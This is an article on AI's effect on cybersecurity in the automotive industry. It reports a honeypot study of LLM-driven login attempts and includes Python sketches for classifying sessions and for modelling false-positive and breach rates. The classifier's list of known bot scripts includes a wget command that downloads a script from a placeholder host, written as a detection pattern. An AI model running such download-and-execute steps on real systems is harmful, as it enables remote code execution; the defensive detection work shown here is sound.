





As artificial intelligence advances rapidly, the cybersecurity sector faces unprecedented challenges and transformations. The use of large language models (LLMs) and deep learning in both attack and defense has disrupted traditional, passive security systems that depended on human involvement. Proactive AI defenses show promise, but they remain constrained by data scarcity and legal boundaries. This shift affects not only the automotive industry but also critical infrastructure worldwide, and it calls for a new security ecosystem built through cross-domain collaboration. Xu Li, cybersecurity director at Yitechi, analyzes the inherent limitations of the traditional attack-and-defense model. On the attack side, both targeted and non-targeted attacks rely heavily on human operators, which makes them time-consuming. On the defense side, organizations mainly adopt passive mechanisms such as security gateways or rule-based detection systems. Yitechi conducts behavioral analysis with research honeypots, which recorded over 110 million login attempts; most came from humans or traditional bots, and 8 were suspected to come from LLMs. Although the ideal state for AI-driven attacks is full automation, real-world attacks have not yet reached that level of sophistication. Defenders can attempt proactive measures, but conflicts between national legal systems hinder counterattacks. Xu points out that building and training models is the core difficulty: because LLMs are trained on human language, their suitability for deep learning in network security remains debatable, yet they are currently the best available choice and may evolve toward adversarial-network architectures in the future.
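Yitechi's actual detection criteria are not described. As a hedged illustration only, the Python sketch below shows one way behavioral pattern analysis of honeypot sessions could separate scripted bots, human operators, and possibly LLM-driven sessions using command timing. The `Session` record, the `KNOWN_BOT_SCRIPTS` set, the `classify` function, and every threshold are hypothetical assumptions, not the company's method.

```python
from dataclasses import dataclass
from statistics import median, pstdev


@dataclass
class Session:
    """Hypothetical honeypot record: commands typed after login and their arrival times (s)."""
    commands: list[str]
    timestamps: list[float]


# Hypothetical command sequences already attributed to known scripted bots.
KNOWN_BOT_SCRIPTS = {
    ("uname -a", "cat /proc/cpuinfo", "wget http://example.invalid/x.sh"),
}


def classify(session: Session) -> str:
    """Return 'bot', 'human', 'llm-suspect' or 'unknown' using illustrative thresholds."""
    if tuple(session.commands) in KNOWN_BOT_SCRIPTS:
        return "bot"  # exact replay of a known script
    gaps = [b - a for a, b in zip(session.timestamps, session.timestamps[1:])]
    if not gaps:
        return "unknown"  # a single command carries too little behavior to judge
    med, spread = median(gaps), pstdev(gaps)
    if med < 0.5:
        return "bot"  # assumption: scripted tools fire commands with sub-second gaps
    if 1.0 <= med <= 10.0 and spread < 0.5 * med:
        # assumption: steady, seconds-scale gaps resemble model inference latency
        return "llm-suspect"
    return "human"  # slower or irregular pacing


# Usage: a non-scripted session with steady ~3 s gaps between commands.
print(classify(Session(["ls", "id", "whoami"], [0.0, 3.0, 6.1])))
```

Timing alone is easy to spoof, so a real pipeline would presumably combine many more signals (for example, whether commands adapt to the honeypot's output) and validate thresholds against labeled sessions.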
Traditional cybersecurity has inherent limitations. Attackers must manually scan systems for open ports and identify potential anchor points (such as unpatched vulnerabilities or weak interfaces), so the process is lengthy and depends on the attacker's skill. Defenders typically rely on passive mechanisms that cannot predict or prevent threats, which makes them inefficient at protecting real-time systems such as automotive electrical/electronic (E/E) architectures. AI is fundamentally reshaping the logic of attack and defense. Attackers can now use LLMs to execute the entire attack chain autonomously, cutting attack time to seconds and raising complexity beyond what humans can manage. For the first time, defenders can actively strike back, but they face legal risk because legislation such as the proposed Active Cyber Defense Certainty (ACDC) Act in the US defines "qualified defenders" ambiguously. In addition, countries' laws on cross-border counterattacks conflict with one another. As evidence of AI attack characteristics, the company deployed a medium-interaction honeypot system that simulates real environments to attract attackers; it recorded over 110 million login attempts and, through behavioral pattern analysis, identified 8 highly suspicious LLM-driven attacks. Current AI security models face fundamental bottlenecks. LLMs depend on natural-language training data, whereas modeling network attack and defense behavior requires multimodal data, which is scarce and hard to annotate. Supervised learning needs humans to annotate attack features, which limits model autonomy, while unsupervised learning suffers from high false-positive rates. There is not yet a unified technical path, and the self-evolution of attack and defense AI remains unstable and prone to getting stuck in local optima.
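The false-positive problem is easy to underestimate at honeypot scale. A back-of-the-envelope sketch, assuming (hypothetically) a detector that flags all 8 LLM-driven attempts but also misflags 0.1% of the other roughly 110 million: that is about 110,000 false alarms, so fewer than 1 in 10,000 alerts would be genuine. The `alert_stats` helper and both rates are illustrative assumptions; only the 110 million and 8 figures come from the study.

```python
def alert_stats(total: int, positives: int, tpr: float, fpr: float) -> tuple[float, float, float]:
    """Return (true alerts, false alerts, precision) for a detector.

    tpr: fraction of real LLM-driven attempts that are flagged.
    fpr: fraction of non-LLM attempts wrongly flagged as LLM-driven.
    """
    negatives = total - positives
    true_alerts = positives * tpr
    false_alerts = negatives * fpr
    precision = true_alerts / (true_alerts + false_alerts)
    return true_alerts, false_alerts, precision


# Counts from the honeypot study; tpr and fpr are illustrative assumptions.
tp, fp, prec = alert_stats(total=110_000_000, positives=8, tpr=1.0, fpr=0.001)
print(f"{tp:.0f} true alerts, {fp:,.0f} false alerts, precision {prec:.5%}")
```

Because genuine LLM-driven attacks are so rare, even a small false-positive rate swamps analysts, which is one reason unsupervised detectors struggle in this setting.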
AI reshapes the essence of cybersecurity competition: attackers need only one successful breach, while defenders must make zero errors. Technical breakthroughs will lie at the intersection of data quality and legal adaptation, which calls for multimodal network-behavior databases and global legal cooperation to clarify the boundaries of AI defense. Significant capability gaps currently exist between countries; in a 2022 cybersecurity ranking, the US placed 4th and China 12th. However, as low-code AI tools proliferate, small and medium enterprises can quickly close resource gaps through cloud security services. In the future, dynamic adversarial defense matrices will become a core pillar of security for smart vehicles and the industrial IoT. Cybersecurity attack and defense will evolve into a continuous contest between AI models. This requires solving data-collection bottlenecks and gaps in legal frameworks, and improving model accuracy, because an attacker needs to succeed only once. Global collaboration is key; without it, the capability gap may expose emerging markets to greater risk.
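The one-success-versus-zero-errors asymmetry can be made concrete with basic probability. A minimal sketch, assuming each attack attempt succeeds independently with the same small probability p (a simplification, since real attempts are rarely independent): the chance of at least one breach in n attempts is 1 - (1 - p)^n, which approaches certainty as automation drives n up, while the defender must hold for every one of the n attempts. The helper names and the 0.1% rate are hypothetical.

```python
import math


def breach_probability(p: float, n: int) -> float:
    """Chance that at least one of n independent attempts succeeds."""
    return 1.0 - (1.0 - p) ** n


def attempts_for(target: float, p: float) -> int:
    """Smallest n with breach_probability(p, n) >= target (requires 0 < p < 1, 0 < target < 1)."""
    return math.ceil(math.log(1.0 - target) / math.log(1.0 - p))


# Hypothetical per-attempt success rate of 0.1%.
for n in (1, 100, 1_000, 10_000):
    print(n, round(breach_probability(0.001, n), 4))
print(attempts_for(0.5, 0.001))
```

Under these assumptions, about 693 attempts already give an attacker better-than-even odds and 1,000 attempts give roughly 63%, so compressing each attempt into seconds shifts the balance sharply toward the attacker.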

The Impact of AI on Cybersecurity in the Automotive Industry
